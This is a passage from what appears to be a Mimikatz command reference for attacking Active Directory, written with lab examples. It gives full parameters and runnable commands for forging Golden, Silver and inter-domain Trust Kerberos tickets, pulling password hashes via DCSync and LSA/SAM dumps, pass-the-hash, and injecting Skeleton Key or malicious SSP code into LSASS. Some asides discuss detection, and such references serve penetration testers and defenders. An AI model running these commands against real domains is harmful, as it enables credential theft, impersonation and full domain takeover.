In this example: “S-1-5-21-1473643419-774954089-2222329127”.\r\n/sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof.\r\nTypically, this will be the Enterprise Admins group for the root domain “S-1-5-21-1473643419-\r\n774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter.\r\n/user – username to impersonate\r\n/groups (optional) – group RIDs the user is a member of (the first is the primary group).\r\nAdd user or computer account RIDs to receive the same access.\r\nDefault Groups: 513,512,520,518,519 for the well-known administrative groups (listed below).\r\n/krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign\r\nthe TGT.\r\n/ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to\r\nimmediately inject the golden ticket into memory for use.\r\n/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.\r\n/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).\r\n/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is\r\nused). Mimikatz Default value is 0.\r\n/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active\r\nDirectory default Kerberos policy setting is 10 hours (600 minutes).\r\n/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years\r\n(~5,262,480 minutes). 
Active Directory default Kerberos policy setting is 7 days (10,080 minutes).\r\n/sids (optional) – set to be the SID of the Enterprise Admins group in the AD forest\r\n([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in\r\nevery domain in the AD Forest).\r\n/aes128 – the AES128 key\r\n/aes256 – the AES256 key\r\nGolden Ticket Default Groups:\r\nDomain Users SID: S-1-5-21\u003cDOMAINID\u003e-513\r\nDomain Admins SID: S-1-5-21\u003cDOMAINID\u003e-512\r\nSchema Admins SID: S-1-5-21\u003cDOMAINID\u003e-518\r\nEnterprise Admins SID: S-1-5-21\u003cDOMAINID\u003e-519 (this is only effective when the forged ticket is\r\ncreated in the Forest root domain, though add using /sids parameter for AD forest admin rights)\r\nGroup Policy Creator Owners SID: S-1-5-21\u003cDOMAINID\u003e-520\r\nkerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID\r\n/sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt\r\nCommand Example:\r\n.\\mimikatz “kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-\r\n135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600\r\n/renewmax:10080 /ptt” exit\r\nGolden Ticket References:\r\n* Golden Tickets are now More Golden (with SID History)\r\nUpdate 1/5/2016:\r\nIn early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently\r\npresented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was\r\nset to static values, usually containing the string “eo.oe”. 
As of the Mimikatz update dated 1/5/2016, forged\r\nKerberos tickets no longer include a domain anomaly since the netbios domain name is placed in the domain\r\ncomponent of the Kerberos ticket.\r\nMimikatz code diff:\r\nMore information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) is in\r\nthe Detecting Forged Kerberos Tickets section.\r\nSilver Ticket\r\nA Silver Ticket is a TGS (similar to TGT in format) using the target service account’s (identified by SPN\r\nmapping) NTLM password hash to encrypt and sign.\r\nThe Mimikatz command to create a silver ticket is “kerberos::golden” (yes, you run ‘golden’ to create silver\r\ntickets).\r\nMimikatz Silver Ticket Command Reference:\r\n/domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.\r\n/sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.\r\n/sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof.\r\nTypically, this will be the Enterprise Admins group for the root domain “S-1-5-21-1473643419-\r\n774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter.\r\n/user – username to impersonate\r\n/groups (optional) – group RIDs the user is a member of (the first is the primary group)\r\ndefault: 513,512,520,518,519 for the well-known administrative groups (listed below).\r\n/ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to\r\nimmediately inject the forged ticket into memory for use.\r\n/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.\r\n/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).\r\n/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is\r\nused). 
Mimikatz Default value is 0.\r\n/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active\r\nDirectory default Kerberos policy setting is 10 hours (600 minutes).\r\n/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years\r\n(~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).\r\n/aes128 – the AES128 key\r\n/aes256 – the AES256 key\r\nSilver Ticket Required Parameters:\r\n/target – the target server’s FQDN.\r\n/service – the kerberos service running on the target server. This is the Service Principal Name class (or\r\ntype) such as cifs, http, mssql.\r\n/rc4 – the NTLM hash for the service (computer account or user account)\r\nSilver Ticket Default Groups:\r\nDomain Users SID: S-1-5-21\u003cDOMAINID\u003e-513\r\nDomain Admins SID: S-1-5-21\u003cDOMAINID\u003e-512\r\nSchema Admins SID: S-1-5-21\u003cDOMAINID\u003e-518\r\nEnterprise Admins SID: S-1-5-21\u003cDOMAINID\u003e-519 (this is only effective when the forged ticket is\r\ncreated in the Forest root domain, though add using /sids parameter for AD forest admin rights)\r\nGroup Policy Creator Owners SID: S-1-5-21\u003cDOMAINID\u003e-520\r\nExample Mimikatz Command to Create a Silver Ticket:\r\nThe following Mimikatz command creates a Silver Ticket for the CIFS service on the server\r\nadsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer\r\naccount password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain\r\ndump or by running Mimikatz on the local system as shown above (Mimikatz “privilege::debug”\r\n“sekurlsa::logonpasswords” exit). The NTLM password hash is used with the /rc4 parameter. The service SPN\r\ntype also needs to be identified in the /service parameter. 
Finally, the target computer’s fully-qualified domain\r\nname needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter.\r\nmimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-\r\n1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org\r\n/rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit\r\nTrust Ticket\r\nOnce the Active Directory Trust password hash is determined (Mimikatz “privilege::debug” “lsadump::trust\r\n/patch” exit), a trust ticket can be generated.\r\nMore background on Trust Tickets.\r\nForging Internal AD Forest Trust Tickets\r\nIn this example, Trust tickets leverage two additional tools Benjamin Delpy wrote called AskTGS and Kirbikator.\r\nStep 1: Dumping trust passwords (trust keys)\r\nCurrent Mimikatz versions can extract the trust keys (passwords).\r\n* Mimikatz “privilege::debug” “lsadump::trust /patch” exit\r\nStep 2: Create a forged trust ticket (inter-realm TGT) using Mimikatz\r\nForge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging\r\nSIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative\r\naccess from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is\r\neffectively a Golden Ticket across the trust.\r\nThe Mimikatz command to create a trust ticket is “kerberos::golden”\r\n/domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.\r\n/sid – the SID of the domain. 
In this example: “S-1-5-21-3677078698-724690114-1972670770”.\r\n/sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof.\r\nTypically, this will be the Enterprise Admins group for the root domain “S-1-5-21-1581655573-\r\n3923512380-696647894-519”. This parameter adds the provided SIDs to the SID History parameter.\r\n/user – username to impersonate\r\n/groups (optional) – group RIDs the user is a member of (the first is the primary group)\r\ndefault: 513,512,520,518,519 for the well-known administrative groups (listed below).\r\n/ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to\r\nimmediately inject the forged ticket into memory for use.\r\n/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.\r\n/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).\r\n/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is\r\nused). Mimikatz Default value is 0.\r\n/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active\r\nDirectory default Kerberos policy setting is 10 hours (600 minutes).\r\n/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years\r\n(~5,262,480 minutes). 
Active Directory default Kerberos policy setting is 7 days (10,080 minutes).\r\n/aes128 – the AES128 key\r\n/aes256 – the AES256 key\r\nTrust Ticket Specific Required Parameters:\r\n/target – the target domain’s FQDN.\r\n/service – the kerberos service running in the target domain (krbtgt).\r\n/rc4 – the NTLM hash for the target domain’s Kerberos service account (krbtgt), i.e. the trust key.\r\n/ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately\r\ninject the forged ticket into memory for use.\r\nTrust Ticket Default Groups:\r\nDomain Users SID: S-1-5-21\u003cDOMAINID\u003e-513\r\nDomain Admins SID: S-1-5-21\u003cDOMAINID\u003e-512\r\nSchema Admins SID: S-1-5-21\u003cDOMAINID\u003e-518\r\nEnterprise Admins SID: S-1-5-21\u003cDOMAINID\u003e-519 (this is only effective when the forged ticket is\r\ncreated in the Forest root domain, though add using /sids parameter for AD forest admin rights)\r\nGroup Policy Creator Owners SID: S-1-5-21\u003cDOMAINID\u003e-520\r\nMimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770\r\n/sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd\r\n/user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\\temp\\tickets\\EA-ADSECLABCHILD.kirbi”\r\nexit\r\nNote: Using the /sids parameter will create a trust ticket for the target AD domain that says the holder is an\r\nEnterprise Admin.\r\nNOTE: Mimikatz generates Silver Tickets with a hard-coded domain value which may appear in some events. It’s\r\nalso likely the domain field in logon/logoff events relating to a forged ticket will have anomalies when compared\r\nto valid Kerberos authentication.\r\nStep 3: Use the Trust Ticket file created in Step 2 to get a TGS for the targeted service in the destination\r\ndomain. 
Save the TGS to a file.\r\nThe resulting TGS provides EA access to the parent (root) domain’s Domain Controller by targeting the CIFS\r\nservice in this example (but it could target any).\r\nAsktgs c:\\temp\\tickets\\EA-ADSECLABCHILD.kirbi CIFS/ADSDC02.lab.adsecurity.org\r\nStep 4: Inject the TGS file created in Step 3 and then access the targeted service with the spoofed rights.\r\nKirbikator lsa c:\\temp\\tickets\\CIFS.ADSDC02.lab.adsecurity.org.kirbi\r\nKERBEROS::Hash – hash password to keys\r\nKERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it\r\nonly displays the current user’s tickets.\r\nSimilar to functionality of “klist”.\r\n/export – export user tickets to files.\r\nUse SEKURLSA::TICKETS to dump Kerberos tickets for all authenticated users on the system.\r\nNote that there are circumstances where the user certificates won’t export. This requires running\r\nSEKURLSA::Tickets /export (with appropriate privileges).\r\nKERBEROS::PTC – pass the cache (NT6)\r\n*Nix systems like Mac OS, Linux, BSD, Unix, etc. cache Kerberos credentials. This cached data can be copied off\r\nand passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.\r\nA good example of Mimikatz’s kerberos::ptc is when exploiting MS14-068 with PyKEK. PyKEK generates a\r\nccache file which can be injected with Mimikatz using kerberos::ptc.\r\nKERBEROS::PTT – pass the ticket\r\nAfter a Kerberos ticket is found, it can be copied to another system and passed into the current session, effectively\r\nsimulating a logon without any communication with the Domain Controller. 
No special rights required.\r\nSimilar to SEKURLSA::PTH (Pass-The-Hash).\r\n/filename – the ticket’s filename (can be multiple)\r\n/directory – a directory path, all .kirbi files inside will be injected.\r\nKERBEROS::Purge – purge all Kerberos tickets\r\nSimilar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the\r\ncorrect user context is used.\r\nKERBEROS::TGT – get current TGT for current user.\r\nLSADUMP\r\nThe LSADUMP Mimikatz Module interacts with the Windows Local Security Authority (LSA) to extract\r\ncredentials. Most of these commands require either debug rights (privilege::debug) or local System. By default, the\r\nAdministrators group has Debug rights. Debug still has to be “activated” by running “privilege::debug”.\r\nLSADUMP::Backupkeys\r\nRequires Administrator rights.\r\nLSADUMP::Cache – Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)\r\nRequires Administrator rights.\r\nLSADUMP::ChangeNTLM – Ask a server to set a new password/ntlm for one user.\r\nLSADUMP::DCShadow – Push replication changes to a Domain Controller. Read more at DCShadow.com.\r\nThis requires full AD admin rights or KRBTGT pw hash.\r\nDCShadow temporarily sets the computer to be a “DC” for the purposes of replication:\r\nCreates 2 objects in the AD forest Configuration partition.\r\nUpdates the SPN of the computer used to include “GC” (Global Catalog) and “E3514235-4B06-11D1-\r\nAB04-00C04FC2DCD2” (AD Replication). 
More info on Kerberos Service Principal Names in the\r\nADSecurity SPN section.\r\nPushes the updates to DCs via DrsReplicaAdd and KCC.\r\nRemoves the created objects from the Configuration partition.\r\nTemporary DC object in the Configuration partition\r\nLSADUMP::DCSync – ask a DC to synchronize an object (get password data for account)\r\nRequires membership in Domain Admins, the domain Administrators group, or custom delegation.\r\nA major feature added to Mimikatz in August 2015 is “DCSync” which effectively “impersonates” a Domain\r\nController and requests account password data from the targeted Domain Controller. DCSync was written by\r\nBenjamin Delpy and Vincent Le Toux. As of Mimikatz version 2.1 alpha 20160501, DCSync works with renamed\r\ndomains.\r\nThe exploit method prior to DCSync was to run Mimikatz or Invoke-Mimikatz on a Domain Controller to get the\r\nKRBTGT password hash to create Golden Tickets. With Mimikatz’s DCSync and the appropriate rights, the\r\nattacker can pull the password hash, as well as previous password hashes, from a Domain Controller over the\r\nnetwork without requiring interactive logon or copying off the Active Directory database file (ntds.dit).\r\nSpecial rights are required to run DCSync. Any member of Administrators, Domain Admins, or Enterprise Admins\r\nas well as Domain Controller computer accounts are able to run DCSync to pull password data. Note that Read-Only Domain Controllers are not allowed to pull password data for users by default.\r\nHow DCSync works:\r\n1. Discovers a Domain Controller in the specified domain name.\r\n2. 
Requests the Domain Controller replicate the user credentials via GetNCChanges (leveraging Directory\r\nReplication Service (DRS) Remote Protocol)\r\nI have previously done some packet captures for Domain Controller replication and identified the intra-DC\r\ncommunication flow regarding how Domain Controllers replicate.\r\nThe Samba Wiki describes the DSGetNCChanges function:\r\n“The client DC sends a DSGetNCChanges request to the server when the first one wants to get AD objects\r\nupdates from the second one. The response contains a set of updates that the client has to apply to its NC replica.\r\n…\r\nWhen a DC receives a DSReplicaSync Request, then for each DC that it replicates from (stored in RepsFrom data\r\nstructure) it performs a replication cycle where it behaves like a client and makes DSGetNCChanges requests to\r\nthat DC. So it gets up-to-date AD objects from each of the DC’s which it replicates from.”\r\nDCSync Options:\r\n/all – DCSync pull data for the entire domain.\r\n/user – user id or SID of the user you want to pull the data for.\r\n/domain (optional) – FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to\r\nconnect to. 
If this parameter is not provided, Mimikatz defaults to the current domain.\r\n/csv – export to csv\r\n/dc (optional) – Specify the Domain Controller you want DCSync to connect to and gather data.\r\nThere’s also a /guid parameter.\r\nDCSync Command Examples:\r\nPull password data for the KRBTGT user account in the rd.adsecurity.org domain:\r\nMimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt” exit\r\nPull password data for the Administrator user account in the rd.adsecurity.org domain:\r\nMimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator” exit\r\nPull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:\r\nMimikatz “lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$” exit\r\nLSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use\r\n/patch for a subset of data, use /inject for everything. Requires System or Debug rights.\r\n/inject – Inject LSASS to extract credentials\r\n/name – account name for target user account\r\n/id – RID for target user account\r\n/patch – patch LSASS.\r\nOften service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged\r\non to the computer an attacker dumped credentials from. 
Using these credentials, an attacker can gain access to a\r\nDomain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to\r\ncreate Kerberos Golden Tickets.\r\nCommand: mimikatz lsadump::lsa /inject exit\r\nDumps credential data in an Active Directory domain when run on a Domain Controller.\r\nRequires administrator access (with debug rights) or Local SYSTEM rights\r\nThe account with RID 502 is the KRBTGT account and the account with RID 500 is the default administrator for\r\nthe domain.\r\nHere’s the result when running LSADUMP::lsa /patch which only dumps the NTLM password hashes.\r\nLSADUMP::NetSync\r\nNetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller\r\nvia a Silver Ticket and DCSync the target account’s information including the password data.\r\nLSADUMP::RpData\r\nLSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to\r\nthe local Security Account Manager (SAM) database and dumps credentials for local accounts.\r\nRequires System or Debug rights.\r\nIt contains the NTLM, and sometimes LM, hashes of users’ passwords. 
It can work in two modes: online (with SYSTEM\r\nuser or token) or offline (with SYSTEM \u0026 SAM hives or backup).\r\nRequires administrator access (with debug rights) or Local SYSTEM rights when run against an online SAM.\r\nGetting an impersonated SYSTEM token: Mimikatz “PRIVILEGE::Debug” “TOKEN::elevate”\r\nLSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives).\r\nRequires System or Debug rights.\r\nLSADUMP::SetNTLM – Ask a server to set a new password/ntlm for one user.\r\nLSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).\r\nRequires System or Debug rights.\r\nExtracts data from Active Directory for existing trust relationships for the domain. The trust key (password) is\r\ndisplayed as well.\r\nMISC\r\nThe MISC Mimikatz module is kind of a catch-all for commands that don’t quite fit elsewhere.\r\nThe most well-known commands in this module are MISC::AddSID, MISC::MemSSP, and MISC::Skeleton.\r\nMISC::AddSid – Add to SIDHistory of a user account. The first value is the target account and the second value is\r\nthe account/group name(s) (or SID).\r\nRequires System or Debug rights.\r\nNOTE: ADDSID has moved to the SID module in the 2.1 release branch.\r\nMISC::Cmd – Command Prompt (without DisableCMD).\r\nRequires Administrator rights.\r\nMISC::Compressme – Compresses Mimikatz file to a new file called “mimikatz_x64.compressed”\r\nMISC::Detours – (experimental) Try to enumerate all modules with Detours-like hooks\r\nRequires Administrator rights.\r\nMISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials by patching LSASS\r\nin memory with new SSP – no reboot required (rebooting clears the memssp Mimikatz injects). 
This post on\r\nMimikatz SSP describes in-memory patching as well as more persistent SSP techniques.\r\nRequires Administrator rights.\r\nMandiant presentation on MemSSP\r\nMISC::MFLT – Gathers details on loaded drivers, including driver altitude.\r\nAvailable starting with Mimikatz v2.1.1 (11/28/2017).\r\nMISC::Ncroutemon – Juniper Manager (without DisableTaskMgr)\r\nMISC::Regedit – Registry Editor (without DisableRegistryTools)\r\nRequires Administrator rights.\r\nMISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller.\r\nRequires Administrator rights.\r\nThis enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton\r\nKeys) as well as their usual password.\r\nMISC::Taskmgr – Task Manager (without DisableTaskMgr).\r\nRequires Administrator rights.\r\nMISC::Wifi –\r\nNo longer in MISC. Likely moved to DPAPI::Wifi which may include similar functionality.\r\nMISC::WP\r\nMINESWEEPER\r\nMINESWEEPER::Infos – Provide mine info in minesweeper\r\nNet\r\nNET::Alias\r\nNET::Group\r\nNET::ServerInfo\r\nNET::Session\r\nNET::Share\r\nNET::Stats\r\nNET::TOD\r\nNET::User\r\nNET::WSession\r\nPRIVILEGE\r\nPRIVILEGE::Backup – get backup privilege/rights. Requires Debug rights.\r\nPRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands).\r\nBy default, the Administrators group has Debug rights. Debug still has to be “activated” by running\r\n“privilege::debug”.\r\nThe debug privilege allows someone to debug a process that they wouldn’t otherwise have access to. 
For example,\r\na process running as a user with the debug privilege enabled on its token can debug a service running as local\r\nsystem.\r\nhttp://msdn.microsoft.com/library/windows/hardware/ff541528.aspx\r\nBenjamin’s Remark:\r\nERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 means that the required privilege is not\r\nheld by the client (mostly you’re not an administrator :smirk:)\r\nPRIVILEGE::Driver – get driver privilege/rights. Requires Debug rights.\r\nPRIVILEGE::ID – get privilege/rights by its ID. Requires Debug rights.\r\nPRIVILEGE::Name – get privilege/rights by its name. Requires Debug rights.\r\nPRIVILEGE::Restore – get restore privilege/rights. Requires Debug rights.\r\nPRIVILEGE::Security – get security privilege/rights. Requires Debug rights.\r\nPRIVILEGE::SysEnv – get privilege/rights to manage system environment. Requires Debug rights.\r\nPRIVILEGE::TCB – get TCB privilege/rights (likely the act as part of the operating system right). 
Requires elevated\r\nrights (still TBD).\r\nPROCESS\r\nThe Mimikatz PROCESS module provides the ability to gather data on processes and interact with processes.\r\nPROCESS::Exports – list exports\r\nPROCESS::Imports – list imports\r\nPROCESS::List – List running processes\r\nRequires Administrator rights.\r\nPROCESS::Resume – resume a process\r\nPROCESS::Run – Run\r\nPROCESS::Start – start a process\r\nPROCESS::Stop – terminate a process\r\nPROCESS::Suspend – suspend a process\r\nRPC\r\nThe RPC module provides remote control of mimikatz.\r\nRPC::Close\r\nRPC::Connect\r\nRPC::Enum\r\nRPC::Server\r\nSEKURLSA\r\nThe SEKURLSA Mimikatz module interacts with protected memory. This module extracts passwords, keys, pin\r\ncodes, tickets from the memory of lsass (Local Security Authority Subsystem Service).\r\nIn order to interact with LSASS, the Mimikatz process requires appropriate rights:\r\nAdministrator, to get debug privilege via “PRIVILEGE::Debug”\r\nSYSTEM rights (“TOKEN::elevate”)\r\nHowever, running against a dumped LSASS process file (i.e. 
LSASS.dmp), elevated rights are not required.\r\nSEKURLSA::Backupkeys – get preferred backup master keys\r\nSEKURLSA::Credman – List Credentials Manager\r\nSEKURLSA::Dpapi – list cached MasterKeys\r\nSEKURLSA::DpapiSystem – DPAPI_SYSTEM secret\r\nSEKURLSA::Ekeys – list Kerberos encryption keys\r\nSEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer\r\naccount)\r\nSEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT) password data\r\nSEKURLSA::LiveSSP – Lists LiveSSP credentials\r\nSEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on\r\nuser and computer credentials.\r\nDumps password data in LSASS for currently logged on (or recently logged on) accounts as well as\r\nservices running under the context of user credentials.\r\nAccount passwords are stored in memory in a reversible manner. If they are in memory (prior to Windows\r\n8.1/Windows Server 2012 R2 they were), they are displayed. Windows 8.1/Windows Server 2012 R2\r\ndoesn’t store the account password in this manner in most cases. KB2871997 “back-ports” this security\r\ncapability to Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012, though the\r\ncomputer needs additional configuration after applying KB2871997.\r\nRequires administrator access (with debug rights) or Local SYSTEM rights\r\nWindows Server 2008 R2 System (Password is shown).
\r\nWindows Server 2012 R2 system – no cleartext password shown\r\nServices running with account credentials are also dumped using this command.\r\nNote that only services that are running (credentials in memory) can be dumped in this manner.\r\nSEKURLSA::Minidump – switch to LSASS minidump process context\r\nThere are several different ways to dump LSASS: procdump, PowerShell, Task Manager, etc.\r\nNote that Minidumps need to be read using the same platform they were dumped from: NT5 Win32, NT5 x64, NT6\r\nWin32 or NT6 x64.\r\nAnother option is to dump the LSASS process with Task Manager\r\nSekurlsa::minidump can open the dump file.\r\nSEKURLSA::MSV – List LM \u0026 NTLM credentials\r\nSEKURLSA::Process – switch to LSASS process context\r\nSEKURLSA::Pth – Pass-the-Hash and Over-Pass-the-Hash (aka pass the key).\r\nMimikatz can perform the well-known operation ‘Pass-The-Hash’ to run a process under another account’s credentials using the\r\nNTLM hash of the user’s password, instead of its real password. 
For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).\r\n/user – the username you want to impersonate; keep in mind that Administrator is not the only name for this well-known account.\r\n/domain – the fully qualified domain name – without a domain, or in the case of a local user/admin, use the computer or server name, workgroup or whatever.\r\n/rc4 or /ntlm – optional – the RC4 key / NTLM hash of the user’s password.\r\n/run – optional – the command line to run – default is: cmd to have a shell.\r\nBenjamin’s Remarks:\r\nThis command does not work with minidumps (nonsense);\r\nit requires elevated privileges (privilege::debug or SYSTEM account), unlike ‘Pass-The-Ticket’ which uses one official API;\r\nthis new version of ‘Pass-The-Hash’ replaces the RC4 keys of Kerberos by the NTLM hash (and/or replaces AES keys) – it permits the Kerberos provider to ask for TGT tickets!;\r\nthe NTLM hash is mandatory on XP/2003/Vista/2008 and, before kb2871997, on 7/2008r2/8/2012 (AES not available or replaceable);\r\nAES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997; in this case you can avoid the NTLM hash.\r\nBenjamin’s post on overpass-the-hash.\r\nSEKURLSA::SSP – Lists SSP credentials\r\nSEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account.\r\nUnlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of other sessions (users).\r\n/export – optional – tickets are exported in .kirbi files. They start with the user’s LUID and group number (0 = TGS, 1 = client ticket(?) 
and 2 = TGT)\r\nSimilar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data in memory on a system, including tickets belonging to an admin or service.\r\nThis is extremely useful if an attacker has compromised a web server configured for Kerberos delegation that users access with a backend SQL server. This enables an attacker to capture and reuse all user tickets in memory on that server.\r\nThe “kerberos::tickets” mimikatz command dumps the current logged-on user’s Kerberos tickets and does not require elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory (LSASS), all Kerberos tickets on the system can be dumped.\r\nCommand: mimikatz sekurlsa::tickets exit\r\nDumps all authenticated Kerberos tickets on a system.\r\nRequires administrator access (with debug) or Local SYSTEM rights.\r\nThe following screenshot shows the dumped password and Kerberos tickets (TGS \u0026 TGT) of another user who is a Domain Admin (LukeSkywalker).\r\nThe following screenshot shows the dumped credentials and Kerberos tickets (TGS \u0026 TGT) of another admin (HanSolo).\r\nThe following screenshot shows the dumped credentials and Kerberos tickets (TGS \u0026 TGT) for a SQL service account (svc-SQLDBEngine01).\r\nSEKURLSA::Trust – get trust keys\r\n(I think this is deprecated in favor of lsadump::trust /patch)\r\nSEKURLSA::TSPKG – Lists TsPkg credentials\r\nSEKURLSA::Wdigest – List WDigest credentials\r\nSERVICE\r\nSERVICE::+ (plus sign) – Install Mimikatz service (‘mimikatzsvc’)\r\nSERVICE::- (minus sign) – Uninstall Mimikatz service 
(‘mimikatzsvc’)\r\nSERVICE::List – List services\r\nSERVICE::Me\r\nSERVICE::Preshutdown – preshutdown service\r\nSERVICE::Remove – Remove service\r\nSERVICE::Resume – resume service\r\nSERVICE::Shutdown – shutdown service\r\nSERVICE::Start – Start a service\r\nSERVICE::Stop – Stop service\r\nSERVICE::Suspend – Suspend the service\r\nSID\r\nThe Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service.\r\nSID::add – Add a SID to the SIDHistory of an object\r\nSID::clear – Clear the SIDHistory of an object\r\nSID::lookup – Name (/name) or SID (/sid) lookup\r\nSID::modify – Modify the object SID of an object\r\nSID::patch – Patch NTDS service\r\nSID::query – Query object by SID or name\r\nSTANDARD\r\nSTANDARD::Answer – Answer to the Ultimate Question of Life, the Universe, and Everything.\r\nSTANDARD::Base64 – switch output to base64 output\r\nSTANDARD::CD – change or display current directory\r\nSTANDARD::CLS – Clear screen\r\nSTANDARD::Coffee – show an ASCII image of coffee 🙂\r\nSTANDARD::Exit – quit Mimikatz\r\nSTANDARD::Hostname – Displays the system’s local hostname\r\nSTANDARD::LocalTime – Displays system local date and time (OJ command)\r\nSTANDARD::Log – Send Mimikatz data to log file\r\nSTANDARD::MarkRus – Pass-the-Hash information. 😉\r\nRemoved in Mimikatz 2.1.1\r\nSTANDARD::Sleep – sleep for a number of milliseconds\r\nSTANDARD::Version – display version information\r\nSYSENV\r\nThe Mimikatz SYSENV module provides the ability to manage system environment variables.\r\nSYSENV::List\r\nSYSENV::Get\r\nSYSENV::Set\r\nSYSENV::Del\r\nTOKEN\r\nThe Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including grabbing and impersonating existing tokens.\r\nTOKEN::Elevate – impersonate a token. 
